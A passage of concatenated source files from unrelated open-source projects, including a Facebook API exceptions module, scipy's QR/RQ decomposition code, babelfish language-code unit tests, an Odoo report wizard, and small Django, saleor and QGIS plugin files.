range += stop - start + 1
else:
range += 1
        # make sure non-specific exceptions are last in the order
if not range:
range = 1000
return range
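# A hedged illustration (not in the original module) of how range() scores
# specificity: ParameterException.codes = (100, 189) below spans 90 codes,
# while UnknownException.codes = 1 spans a single code, so the narrower class
# wins when an error is matched to the most specific exception class.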
class ParameterException(OpenFacebookException):
'''
100-189
190 and up are oauth errors
'''
codes = (100, 189)
class UnknownException(OpenFacebookException):
'''
Raised when facebook themselves don't know what went wrong
'''
codes = 1
class OAuthException(OpenFacebookException):
pass
class PermissionException(OAuthException):
'''
200-300
'''
codes = [3, (200, 299)]
class UserPermissionException(PermissionException):
codes = (300, 399)
class FeedActionLimit(UserPermissionException):
'''
    When you have posted too many times from one user account
'''
codes = 341
class OpenGraphException(OpenFacebookException):
'''
Raised when we get error 3502, representing a problem with facebook
open graph data on the page
'''
codes = 3502
class DuplicateStatusMessage(OpenFacebookException):
codes = 506
class MissingParameter(OpenFacebookException):
pass
class AliasException(OpenFacebookException):
'''
    When you send a request to a non-existent URL, facebook gives this error
instead of a 404....
'''
codes = 803
class UnsupportedDeleteRequest(OpenFacebookException):
pass
class ParseException(OpenFacebookException):
'''
Anything preventing us from parsing the Facebook response
'''
pass
class FacebookUnreachable(OpenFacebookException):
'''
Timeouts, 500s, SSL errors etc
'''
pass
class FacebookSSLError(FacebookUnreachable, ssl.SSLError):
pass
class FacebookHTTPError(FacebookUnreachable, HTTPError):
pass
class FacebookURLError(FacebookUnreachable, URLError):
pass
def map_unreachable_exception(e):
'''
We always raise the original and new subclass to
- preserve backwards compatibility
'''
exception_class = FacebookUnreachable
if isinstance(e, ssl.SSLError):
exception_class = FacebookSSLError
elif isinstance(e, HTTPError):
exception_class = FacebookHTTPError
elif isinstance(e, URLError):
exception_class = FacebookURLError
return exception_class
def convert_unreachable_exception(e, error_format='Facebook is unreachable %s'):
'''
Converts an SSLError, HTTPError or URLError into something subclassing
FacebookUnreachable allowing code to easily try except this
'''
exception_class = map_unreachable_exception(e)
error_message = error_format % str(e)
exception = exception_class(error_message)
return exception
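# A minimal usage sketch (not part of the original module); the urlopen call
# and the URL are hypothetical placeholders:
#
#   try:
#       response = urlopen('https://graph.facebook.com/me')
#   except (ssl.SSLError, HTTPError, URLError) as e:
#       raise convert_unreachable_exception(e)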
def get_exception_classes():
from open_facebook import exceptions as facebook_exceptions
all_exceptions = dir(facebook_exceptions)
classes = [getattr(facebook_exceptions, e, None) for e in all_exceptions]
exception_classes = [e for e in classes if getattr(
e, 'codes', None) and issubclass(
e, OpenFacebookException)]
return exception_classes
|
obi-two/Rebelion
|
refs/heads/master
|
data/scripts/templates/object/tangible/mission/quest_item/shared_brennis_doore_q1_needed.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/mission/quest_item/shared_brennis_doore_q1_needed.iff"
result.attribute_template_id = -1
result.stfName("loot_nboo_n","brennis_doore_q1_needed")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
vberaudi/scipy
|
refs/heads/master
|
scipy/linalg/decomp_qr.py
|
82
|
"""QR decomposition functions."""
from __future__ import division, print_function, absolute_import
import numpy
# Local imports
from .lapack import get_lapack_funcs
from .misc import _datacopied
__all__ = ['qr', 'qr_multiply', 'rq']
def safecall(f, name, *args, **kwargs):
"""Call a LAPACK routine, determining lwork automatically and handling
error return values"""
lwork = kwargs.get("lwork", None)
if lwork in (None, -1):
kwargs['lwork'] = -1
ret = f(*args, **kwargs)
kwargs['lwork'] = ret[-2][0].real.astype(numpy.int)
ret = f(*args, **kwargs)
if ret[-1] < 0:
raise ValueError("illegal value in %d-th argument of internal %s"
% (-ret[-1], name))
return ret[:-2]
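# Calling convention, as used by qr() below; the routine name is only used
# for error reporting:
#   geqrf, = get_lapack_funcs(('geqrf',), (a1,))
#   qr, tau = safecall(geqrf, "geqrf", a1, lwork=lwork, overwrite_a=overwrite_a)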
def qr(a, overwrite_a=False, lwork=None, mode='full', pivoting=False,
check_finite=True):
"""
Compute QR decomposition of a matrix.
Calculate the decomposition ``A = Q R`` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : (M, N) array_like
Matrix to be decomposed
overwrite_a : bool, optional
Whether data in a is overwritten (may improve performance)
lwork : int, optional
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
mode : {'full', 'r', 'economic', 'raw'}, optional
Determines what information is to be returned: either both Q and R
('full', default), only R ('r') or both Q and R but computed in
economy-size ('economic', see Notes). The final option 'raw'
(added in Scipy 0.11) makes the function return two matrices
(Q, TAU) in the internal format used by LAPACK.
pivoting : bool, optional
Whether or not factorization should include pivoting for rank-revealing
qr decomposition. If pivoting, compute the decomposition
``A P = Q R`` as above, but where P is chosen such that the diagonal
of R is non-increasing.
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
Q : float or complex ndarray
Of shape (M, M), or (M, K) for ``mode='economic'``. Not returned
if ``mode='r'``.
R : float or complex ndarray
Of shape (M, N), or (K, N) for ``mode='economic'``. ``K = min(M, N)``.
P : int ndarray
Of shape (N,) for ``pivoting=True``. Not returned if
``pivoting=False``.
Raises
------
LinAlgError
Raised if decomposition fails
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dorgqr, zungqr, dgeqp3, and zgeqp3.
If ``mode=economic``, the shapes of Q and R are (M, K) and (K, N) instead
of (M,M) and (M,N), with ``K=min(M,N)``.
Examples
--------
>>> from scipy import random, linalg, dot, diag, all, allclose
>>> a = random.randn(9, 6)
>>> q, r = linalg.qr(a)
    >>> allclose(a, dot(q, r))
True
>>> q.shape, r.shape
((9, 9), (9, 6))
>>> r2 = linalg.qr(a, mode='r')
>>> allclose(r, r2)
True
>>> q3, r3 = linalg.qr(a, mode='economic')
>>> q3.shape, r3.shape
((9, 6), (6, 6))
>>> q4, r4, p4 = linalg.qr(a, pivoting=True)
>>> d = abs(diag(r4))
>>> all(d[1:] <= d[:-1])
True
>>> allclose(a[:, p4], dot(q4, r4))
True
>>> q4.shape, r4.shape, p4.shape
((9, 9), (9, 6), (6,))
>>> q5, r5, p5 = linalg.qr(a, mode='economic', pivoting=True)
>>> q5.shape, r5.shape, p5.shape
((9, 6), (6, 6), (6,))
"""
# 'qr' was the old default, equivalent to 'full'. Neither 'full' nor
# 'qr' are used below.
# 'raw' is used internally by qr_multiply
if mode not in ['full', 'qr', 'r', 'economic', 'raw']:
raise ValueError(
"Mode argument should be one of ['full', 'r', 'economic', 'raw']")
if check_finite:
a1 = numpy.asarray_chkfinite(a)
else:
a1 = numpy.asarray(a)
if len(a1.shape) != 2:
raise ValueError("expected 2D array")
M, N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
if pivoting:
geqp3, = get_lapack_funcs(('geqp3',), (a1,))
qr, jpvt, tau = safecall(geqp3, "geqp3", a1, overwrite_a=overwrite_a)
jpvt -= 1 # geqp3 returns a 1-based index array, so subtract 1
else:
geqrf, = get_lapack_funcs(('geqrf',), (a1,))
qr, tau = safecall(geqrf, "geqrf", a1, lwork=lwork,
overwrite_a=overwrite_a)
if mode not in ['economic', 'raw'] or M < N:
R = numpy.triu(qr)
else:
R = numpy.triu(qr[:N, :])
if pivoting:
Rj = R, jpvt
else:
Rj = R,
if mode == 'r':
return Rj
elif mode == 'raw':
return ((qr, tau),) + Rj
gor_un_gqr, = get_lapack_funcs(('orgqr',), (qr,))
if M < N:
Q, = safecall(gor_un_gqr, "gorgqr/gungqr", qr[:, :M], tau,
lwork=lwork, overwrite_a=1)
elif mode == 'economic':
Q, = safecall(gor_un_gqr, "gorgqr/gungqr", qr, tau, lwork=lwork,
overwrite_a=1)
else:
t = qr.dtype.char
qqr = numpy.empty((M, M), dtype=t)
qqr[:, :N] = qr
Q, = safecall(gor_un_gqr, "gorgqr/gungqr", qqr, tau, lwork=lwork,
overwrite_a=1)
return (Q,) + Rj
def qr_multiply(a, c, mode='right', pivoting=False, conjugate=False,
overwrite_a=False, overwrite_c=False):
"""
Calculate the QR decomposition and multiply Q with a matrix.
Calculate the decomposition ``A = Q R`` where Q is unitary/orthogonal
and R upper triangular. Multiply Q with a vector or a matrix c.
Parameters
----------
a : array_like, shape (M, N)
Matrix to be decomposed
c : array_like, one- or two-dimensional
calculate the product of c and q, depending on the mode:
mode : {'left', 'right'}, optional
``dot(Q, c)`` is returned if mode is 'left',
``dot(c, Q)`` is returned if mode is 'right'.
The shape of c must be appropriate for the matrix multiplications,
if mode is 'left', ``min(a.shape) == c.shape[0]``,
if mode is 'right', ``a.shape[0] == c.shape[1]``.
pivoting : bool, optional
Whether or not factorization should include pivoting for rank-revealing
qr decomposition, see the documentation of qr.
conjugate : bool, optional
Whether Q should be complex-conjugated. This might be faster
than explicit conjugation.
overwrite_a : bool, optional
Whether data in a is overwritten (may improve performance)
overwrite_c : bool, optional
Whether data in c is overwritten (may improve performance).
If this is used, c must be big enough to keep the result,
i.e. c.shape[0] = a.shape[0] if mode is 'left'.
Returns
-------
CQ : float or complex ndarray
the product of Q and c, as defined in mode
R : float or complex ndarray
Of shape (K, N), ``K = min(M, N)``.
P : ndarray of ints
Of shape (N,) for ``pivoting=True``.
Not returned if ``pivoting=False``.
Raises
------
LinAlgError
Raised if decomposition fails
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dormqr, zunmqr, dgeqp3, and zgeqp3.
.. versionadded:: 0.11.0
"""
if mode not in ['left', 'right']:
raise ValueError("Mode argument should be one of ['left', 'right']")
c = numpy.asarray_chkfinite(c)
onedim = c.ndim == 1
if onedim:
c = c.reshape(1, len(c))
if mode == "left":
c = c.T
a = numpy.asarray(a) # chkfinite done in qr
M, N = a.shape
if not (mode == "left" and
(not overwrite_c and min(M, N) == c.shape[0] or
overwrite_c and M == c.shape[0]) or
mode == "right" and M == c.shape[1]):
raise ValueError("objects are not aligned")
raw = qr(a, overwrite_a, None, "raw", pivoting)
Q, tau = raw[0]
gor_un_mqr, = get_lapack_funcs(('ormqr',), (Q,))
if gor_un_mqr.typecode in ('s', 'd'):
trans = "T"
else:
trans = "C"
Q = Q[:, :min(M, N)]
if M > N and mode == "left" and not overwrite_c:
if conjugate:
cc = numpy.zeros((c.shape[1], M), dtype=c.dtype, order="F")
cc[:, :N] = c.T
else:
cc = numpy.zeros((M, c.shape[1]), dtype=c.dtype, order="F")
cc[:N, :] = c
trans = "N"
if conjugate:
lr = "R"
else:
lr = "L"
overwrite_c = True
elif c.flags["C_CONTIGUOUS"] and trans == "T" or conjugate:
cc = c.T
if mode == "left":
lr = "R"
else:
lr = "L"
else:
trans = "N"
cc = c
if mode == "left":
lr = "L"
else:
lr = "R"
cQ, = safecall(gor_un_mqr, "gormqr/gunmqr", lr, trans, Q, tau, cc,
overwrite_c=overwrite_c)
if trans != "N":
cQ = cQ.T
if mode == "right":
cQ = cQ[:, :min(M, N)]
if onedim:
cQ = cQ.ravel()
return (cQ,) + raw[1:]
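# A small usage sketch (not from the original file); shapes follow the
# docstring above: for mode='right', c.shape[1] must equal a.shape[0].
#   a = numpy.random.randn(9, 6)
#   c = numpy.random.randn(3, 9)
#   cq, r = qr_multiply(a, c, mode='right')   # cq ~ c.dot(Q), shape (3, 6)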
def rq(a, overwrite_a=False, lwork=None, mode='full', check_finite=True):
"""
Compute RQ decomposition of a matrix.
Calculate the decomposition ``A = R Q`` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : (M, N) array_like
Matrix to be decomposed
overwrite_a : bool, optional
Whether data in a is overwritten (may improve performance)
lwork : int, optional
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
mode : {'full', 'r', 'economic'}, optional
Determines what information is to be returned: either both Q and R
('full', default), only R ('r') or both Q and R but computed in
economy-size ('economic', see Notes).
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
R : float or complex ndarray
Of shape (M, N) or (M, K) for ``mode='economic'``. ``K = min(M, N)``.
Q : float or complex ndarray
Of shape (N, N) or (K, N) for ``mode='economic'``. Not returned
if ``mode='r'``.
Raises
------
LinAlgError
If decomposition fails.
Notes
-----
This is an interface to the LAPACK routines sgerqf, dgerqf, cgerqf, zgerqf,
sorgrq, dorgrq, cungrq and zungrq.
If ``mode=economic``, the shapes of Q and R are (K, N) and (M, K) instead
of (N,N) and (M,N), with ``K=min(M,N)``.
Examples
--------
>>> from scipy import linalg
>>> from numpy import random, dot, allclose
>>> a = random.randn(6, 9)
>>> r, q = linalg.rq(a)
>>> allclose(a, dot(r, q))
True
>>> r.shape, q.shape
((6, 9), (9, 9))
>>> r2 = linalg.rq(a, mode='r')
>>> allclose(r, r2)
True
>>> r3, q3 = linalg.rq(a, mode='economic')
>>> r3.shape, q3.shape
((6, 6), (6, 9))
"""
if mode not in ['full', 'r', 'economic']:
raise ValueError(
"Mode argument should be one of ['full', 'r', 'economic']")
if check_finite:
a1 = numpy.asarray_chkfinite(a)
else:
a1 = numpy.asarray(a)
if len(a1.shape) != 2:
raise ValueError('expected matrix')
M, N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
gerqf, = get_lapack_funcs(('gerqf',), (a1,))
rq, tau = safecall(gerqf, 'gerqf', a1, lwork=lwork,
overwrite_a=overwrite_a)
if not mode == 'economic' or N < M:
R = numpy.triu(rq, N-M)
else:
R = numpy.triu(rq[-M:, -M:])
if mode == 'r':
return R
gor_un_grq, = get_lapack_funcs(('orgrq',), (rq,))
if N < M:
Q, = safecall(gor_un_grq, "gorgrq/gungrq", rq[-N:], tau, lwork=lwork,
overwrite_a=1)
elif mode == 'economic':
Q, = safecall(gor_un_grq, "gorgrq/gungrq", rq, tau, lwork=lwork,
overwrite_a=1)
else:
rq1 = numpy.empty((N, N), dtype=rq.dtype)
rq1[-M:] = rq
Q, = safecall(gor_un_grq, "gorgrq/gungrq", rq1, tau, lwork=lwork,
overwrite_a=1)
return R, Q
|
cloud9UG/odoo
|
refs/heads/8.0
|
addons/l10n_fr/wizard/fr_report_compute_resultant.py
|
374
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs.
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company.
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
from openerp.osv import fields, osv
class account_cdr_report(osv.osv_memory):
_name = 'account.cdr.report'
_description = 'Account CDR Report'
def _get_defaults(self, cr, uid, context=None):
fiscalyear_id = self.pool.get('account.fiscalyear').find(cr, uid)
return fiscalyear_id
_columns = {
'fiscalyear_id': fields.many2one('account.fiscalyear', 'Fiscal Year', required=True),
}
_defaults = {
'fiscalyear_id': _get_defaults
}
def print_cdr_report(self, cr, uid, ids, context=None):
active_ids = context.get('active_ids', [])
data = {}
data['form'] = {}
data['ids'] = active_ids
data['form']['fiscalyear_id'] = self.browse(cr, uid, ids)[0].fiscalyear_id.id
return self.pool['report'].get_action(
cr, uid, ids, 'l10n_fr.report_l10nfrresultat', data=data, context=context
)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ch1huizong/dj
|
refs/heads/master
|
onlineshop/myshop/orders/tests.py
|
24123
|
from django.test import TestCase
# Create your tests here.
|
sergeysynergy/graph
|
refs/heads/master
|
django/zcore/tests.py
|
24123
|
from django.test import TestCase
# Create your tests here.
|
roderickvd/nzbToMedia
|
refs/heads/master
|
libs/babelfish/tests.py
|
40
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 the BabelFish authors. All rights reserved.
# Use of this source code is governed by the 3-clause BSD license
# that can be found in the LICENSE file.
#
from __future__ import unicode_literals
import re
import sys
import pickle
from unittest import TestCase, TestSuite, TestLoader, TextTestRunner
from pkg_resources import resource_stream # @UnresolvedImport
from babelfish import (LANGUAGES, Language, Country, Script, language_converters, country_converters,
LanguageReverseConverter, LanguageConvertError, LanguageReverseError, CountryReverseError)
if sys.version_info[:2] <= (2, 6):
_MAX_LENGTH = 80
def safe_repr(obj, short=False):
try:
result = repr(obj)
except Exception:
result = object.__repr__(obj)
if not short or len(result) < _MAX_LENGTH:
return result
return result[:_MAX_LENGTH] + ' [truncated]...'
class _AssertRaisesContext(object):
"""A context manager used to implement TestCase.assertRaises* methods."""
def __init__(self, expected, test_case, expected_regexp=None):
self.expected = expected
self.failureException = test_case.failureException
self.expected_regexp = expected_regexp
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
if exc_type is None:
try:
exc_name = self.expected.__name__
except AttributeError:
exc_name = str(self.expected)
raise self.failureException(
"{0} not raised".format(exc_name))
if not issubclass(exc_type, self.expected):
# let unexpected exceptions pass through
return False
self.exception = exc_value # store for later retrieval
if self.expected_regexp is None:
return True
expected_regexp = self.expected_regexp
if isinstance(expected_regexp, basestring):
expected_regexp = re.compile(expected_regexp)
if not expected_regexp.search(str(exc_value)):
raise self.failureException('"%s" does not match "%s"' %
(expected_regexp.pattern, str(exc_value)))
return True
class _Py26FixTestCase(object):
def assertIsNone(self, obj, msg=None):
"""Same as self.assertTrue(obj is None), with a nicer default message."""
if obj is not None:
standardMsg = '%s is not None' % (safe_repr(obj),)
self.fail(self._formatMessage(msg, standardMsg))
def assertIsNotNone(self, obj, msg=None):
"""Included for symmetry with assertIsNone."""
if obj is None:
standardMsg = 'unexpectedly None'
self.fail(self._formatMessage(msg, standardMsg))
def assertIn(self, member, container, msg=None):
"""Just like self.assertTrue(a in b), but with a nicer default message."""
if member not in container:
standardMsg = '%s not found in %s' % (safe_repr(member),
safe_repr(container))
self.fail(self._formatMessage(msg, standardMsg))
def assertNotIn(self, member, container, msg=None):
"""Just like self.assertTrue(a not in b), but with a nicer default message."""
if member in container:
standardMsg = '%s unexpectedly found in %s' % (safe_repr(member),
safe_repr(container))
self.fail(self._formatMessage(msg, standardMsg))
def assertIs(self, expr1, expr2, msg=None):
"""Just like self.assertTrue(a is b), but with a nicer default message."""
if expr1 is not expr2:
standardMsg = '%s is not %s' % (safe_repr(expr1),
safe_repr(expr2))
self.fail(self._formatMessage(msg, standardMsg))
def assertIsNot(self, expr1, expr2, msg=None):
"""Just like self.assertTrue(a is not b), but with a nicer default message."""
if expr1 is expr2:
standardMsg = 'unexpectedly identical: %s' % (safe_repr(expr1),)
self.fail(self._formatMessage(msg, standardMsg))
else:
class _Py26FixTestCase(object):
pass
class TestScript(TestCase, _Py26FixTestCase):
def test_wrong_script(self):
self.assertRaises(ValueError, lambda: Script('Azer'))
def test_eq(self):
self.assertEqual(Script('Latn'), Script('Latn'))
def test_ne(self):
self.assertNotEqual(Script('Cyrl'), Script('Latn'))
def test_hash(self):
self.assertEqual(hash(Script('Hira')), hash('Hira'))
def test_pickle(self):
self.assertEqual(pickle.loads(pickle.dumps(Script('Latn'))), Script('Latn'))
class TestCountry(TestCase, _Py26FixTestCase):
def test_wrong_country(self):
self.assertRaises(ValueError, lambda: Country('ZZ'))
def test_eq(self):
self.assertEqual(Country('US'), Country('US'))
def test_ne(self):
self.assertNotEqual(Country('GB'), Country('US'))
self.assertIsNotNone(Country('US'))
def test_hash(self):
self.assertEqual(hash(Country('US')), hash('US'))
def test_pickle(self):
for country in [Country('GB'), Country('US')]:
self.assertEqual(pickle.loads(pickle.dumps(country)), country)
def test_converter_name(self):
self.assertEqual(Country('US').name, 'UNITED STATES')
self.assertEqual(Country.fromname('UNITED STATES'), Country('US'))
self.assertEqual(Country.fromcode('UNITED STATES', 'name'), Country('US'))
self.assertRaises(CountryReverseError, lambda: Country.fromname('ZZZZZ'))
self.assertEqual(len(country_converters['name'].codes), 249)
class TestLanguage(TestCase, _Py26FixTestCase):
def test_languages(self):
self.assertEqual(len(LANGUAGES), 7874)
def test_wrong_language(self):
self.assertRaises(ValueError, lambda: Language('zzz'))
def test_unknown_language(self):
self.assertEqual(Language('zzzz', unknown='und'), Language('und'))
def test_converter_alpha2(self):
self.assertEqual(Language('eng').alpha2, 'en')
self.assertEqual(Language.fromalpha2('en'), Language('eng'))
self.assertEqual(Language.fromcode('en', 'alpha2'), Language('eng'))
self.assertRaises(LanguageReverseError, lambda: Language.fromalpha2('zz'))
self.assertRaises(LanguageConvertError, lambda: Language('aaa').alpha2)
self.assertEqual(len(language_converters['alpha2'].codes), 184)
def test_converter_alpha3b(self):
self.assertEqual(Language('fra').alpha3b, 'fre')
self.assertEqual(Language.fromalpha3b('fre'), Language('fra'))
self.assertEqual(Language.fromcode('fre', 'alpha3b'), Language('fra'))
self.assertRaises(LanguageReverseError, lambda: Language.fromalpha3b('zzz'))
self.assertRaises(LanguageConvertError, lambda: Language('aaa').alpha3b)
self.assertEqual(len(language_converters['alpha3b'].codes), 418)
def test_converter_alpha3t(self):
self.assertEqual(Language('fra').alpha3t, 'fra')
self.assertEqual(Language.fromalpha3t('fra'), Language('fra'))
self.assertEqual(Language.fromcode('fra', 'alpha3t'), Language('fra'))
self.assertRaises(LanguageReverseError, lambda: Language.fromalpha3t('zzz'))
self.assertRaises(LanguageConvertError, lambda: Language('aaa').alpha3t)
self.assertEqual(len(language_converters['alpha3t'].codes), 418)
def test_converter_name(self):
self.assertEqual(Language('eng').name, 'English')
self.assertEqual(Language.fromname('English'), Language('eng'))
self.assertEqual(Language.fromcode('English', 'name'), Language('eng'))
self.assertRaises(LanguageReverseError, lambda: Language.fromname('Zzzzzzzzz'))
self.assertEqual(len(language_converters['name'].codes), 7874)
def test_converter_scope(self):
self.assertEqual(language_converters['scope'].codes, set(['I', 'S', 'M']))
self.assertEqual(Language('eng').scope, 'individual')
self.assertEqual(Language('und').scope, 'special')
def test_converter_type(self):
self.assertEqual(language_converters['type'].codes, set(['A', 'C', 'E', 'H', 'L', 'S']))
self.assertEqual(Language('eng').type, 'living')
self.assertEqual(Language('und').type, 'special')
def test_converter_opensubtitles(self):
self.assertEqual(Language('fra').opensubtitles, Language('fra').alpha3b)
self.assertEqual(Language('por', 'BR').opensubtitles, 'pob')
self.assertEqual(Language.fromopensubtitles('fre'), Language('fra'))
self.assertEqual(Language.fromopensubtitles('pob'), Language('por', 'BR'))
self.assertEqual(Language.fromopensubtitles('pb'), Language('por', 'BR'))
# Montenegrin is not recognized as an ISO language (yet?) but for now it is
# unofficially accepted as Serbian from Montenegro
self.assertEqual(Language.fromopensubtitles('mne'), Language('srp', 'ME'))
self.assertEqual(Language.fromcode('pob', 'opensubtitles'), Language('por', 'BR'))
self.assertRaises(LanguageReverseError, lambda: Language.fromopensubtitles('zzz'))
self.assertRaises(LanguageConvertError, lambda: Language('aaa').opensubtitles)
self.assertEqual(len(language_converters['opensubtitles'].codes), 606)
        # test with all the languages from the opensubtitles api
# downloaded from: http://www.opensubtitles.org/addons/export_languages.php
f = resource_stream('babelfish', 'data/opensubtitles_languages.txt')
f.readline()
for l in f:
idlang, alpha2, _, upload_enabled, web_enabled = l.decode('utf-8').strip().split('\t')
if not int(upload_enabled) and not int(web_enabled):
                # do not test languages that are too esoteric / not widely available
continue
self.assertEqual(Language.fromopensubtitles(idlang).opensubtitles, idlang)
if alpha2:
self.assertEqual(Language.fromopensubtitles(idlang), Language.fromopensubtitles(alpha2))
f.close()
def test_fromietf_country_script(self):
language = Language.fromietf('fra-FR-Latn')
self.assertEqual(language.alpha3, 'fra')
self.assertEqual(language.country, Country('FR'))
self.assertEqual(language.script, Script('Latn'))
def test_fromietf_country_no_script(self):
language = Language.fromietf('fra-FR')
self.assertEqual(language.alpha3, 'fra')
self.assertEqual(language.country, Country('FR'))
self.assertIsNone(language.script)
def test_fromietf_no_country_no_script(self):
        language = Language.fromietf('fra')
        self.assertEqual(language.alpha3, 'fra')
        self.assertIsNone(language.country)
        self.assertIsNone(language.script)
def test_fromietf_no_country_script(self):
language = Language.fromietf('fra-Latn')
self.assertEqual(language.alpha3, 'fra')
self.assertIsNone(language.country)
self.assertEqual(language.script, Script('Latn'))
def test_fromietf_alpha2_language(self):
language = Language.fromietf('fr-Latn')
self.assertEqual(language.alpha3, 'fra')
self.assertIsNone(language.country)
self.assertEqual(language.script, Script('Latn'))
def test_fromietf_wrong_language(self):
self.assertRaises(ValueError, lambda: Language.fromietf('xyz-FR'))
def test_fromietf_wrong_country(self):
self.assertRaises(ValueError, lambda: Language.fromietf('fra-YZ'))
def test_fromietf_wrong_script(self):
self.assertRaises(ValueError, lambda: Language.fromietf('fra-FR-Wxyz'))
def test_eq(self):
self.assertEqual(Language('eng'), Language('eng'))
def test_ne(self):
self.assertNotEqual(Language('fra'), Language('eng'))
self.assertIsNotNone(Language('fra'))
def test_nonzero(self):
self.assertFalse(bool(Language('und')))
self.assertTrue(bool(Language('eng')))
def test_language_hasattr(self):
self.assertTrue(hasattr(Language('fra'), 'alpha3'))
self.assertTrue(hasattr(Language('fra'), 'alpha2'))
self.assertFalse(hasattr(Language('bej'), 'alpha2'))
def test_country(self):
self.assertEqual(Language('por', 'BR').country, Country('BR'))
self.assertEqual(Language('eng', Country('US')).country, Country('US'))
def test_eq_with_country(self):
self.assertEqual(Language('eng', 'US'), Language('eng', Country('US')))
def test_ne_with_country(self):
self.assertNotEqual(Language('eng', 'US'), Language('eng', Country('GB')))
def test_script(self):
self.assertEqual(Language('srp', script='Latn').script, Script('Latn'))
self.assertEqual(Language('srp', script=Script('Cyrl')).script, Script('Cyrl'))
def test_eq_with_script(self):
self.assertEqual(Language('srp', script='Latn'), Language('srp', script=Script('Latn')))
def test_ne_with_script(self):
self.assertNotEqual(Language('srp', script='Latn'), Language('srp', script=Script('Cyrl')))
def test_eq_with_country_and_script(self):
self.assertEqual(Language('srp', 'SR', 'Latn'), Language('srp', Country('SR'), Script('Latn')))
def test_ne_with_country_and_script(self):
self.assertNotEqual(Language('srp', 'SR', 'Latn'), Language('srp', Country('SR'), Script('Cyrl')))
def test_hash(self):
self.assertEqual(hash(Language('fra')), hash('fr'))
self.assertEqual(hash(Language('ace')), hash('ace'))
self.assertEqual(hash(Language('por', 'BR')), hash('pt-BR'))
self.assertEqual(hash(Language('srp', script='Cyrl')), hash('sr-Cyrl'))
self.assertEqual(hash(Language('eng', 'US', 'Latn')), hash('en-US-Latn'))
def test_pickle(self):
for lang in [Language('fra'),
Language('eng', 'US'),
Language('srp', script='Latn'),
Language('eng', 'US', 'Latn')]:
self.assertEqual(pickle.loads(pickle.dumps(lang)), lang)
def test_str(self):
self.assertEqual(Language.fromietf(str(Language('eng', 'US', 'Latn'))), Language('eng', 'US', 'Latn'))
self.assertEqual(Language.fromietf(str(Language('fra', 'FR'))), Language('fra', 'FR'))
self.assertEqual(Language.fromietf(str(Language('bel'))), Language('bel'))
def test_register_converter(self):
class TestConverter(LanguageReverseConverter):
def __init__(self):
self.to_test = {'fra': 'test1', 'eng': 'test2'}
self.from_test = {'test1': 'fra', 'test2': 'eng'}
def convert(self, alpha3, country=None, script=None):
if alpha3 not in self.to_test:
raise LanguageConvertError(alpha3, country, script)
return self.to_test[alpha3]
def reverse(self, test):
if test not in self.from_test:
raise LanguageReverseError(test)
return (self.from_test[test], None)
language = Language('fra')
self.assertFalse(hasattr(language, 'test'))
language_converters['test'] = TestConverter()
self.assertTrue(hasattr(language, 'test'))
self.assertIn('test', language_converters)
self.assertEqual(Language('fra').test, 'test1')
self.assertEqual(Language.fromtest('test2').alpha3, 'eng')
del language_converters['test']
self.assertNotIn('test', language_converters)
self.assertRaises(KeyError, lambda: Language.fromtest('test1'))
self.assertRaises(AttributeError, lambda: Language('fra').test)
def suite():
suite = TestSuite()
suite.addTest(TestLoader().loadTestsFromTestCase(TestScript))
suite.addTest(TestLoader().loadTestsFromTestCase(TestCountry))
suite.addTest(TestLoader().loadTestsFromTestCase(TestLanguage))
return suite
if __name__ == '__main__':
TextTestRunner().run(suite())
|
maferelo/saleor
|
refs/heads/master
|
saleor/extensions/error_codes.py
|
2
|
from enum import Enum
class ExtensionsErrorCode(Enum):
GRAPHQL_ERROR = "graphql_error"
INVALID = "invalid"
PLUGIN_MISCONFIGURED = "plugin-misconfigured"
NOT_FOUND = "not_found"
REQUIRED = "required"
UNIQUE = "unique"
|
julienperret/TidyCity
|
refs/heads/master
|
tidy_city_dialog.py
|
1
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
TidyCityDialog
A QGIS plugin
A simple QGIS python plugin for building tidy cities.
-------------------
begin : 2016-11-30
git sha : $Format:%H$
copyright : (C) 2016 by IGN
email : julien.perret@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import os
from PyQt5 import QtGui, uic
from PyQt5.QtWidgets import QDialog
FORM_CLASS, _ = uic.loadUiType(os.path.join(
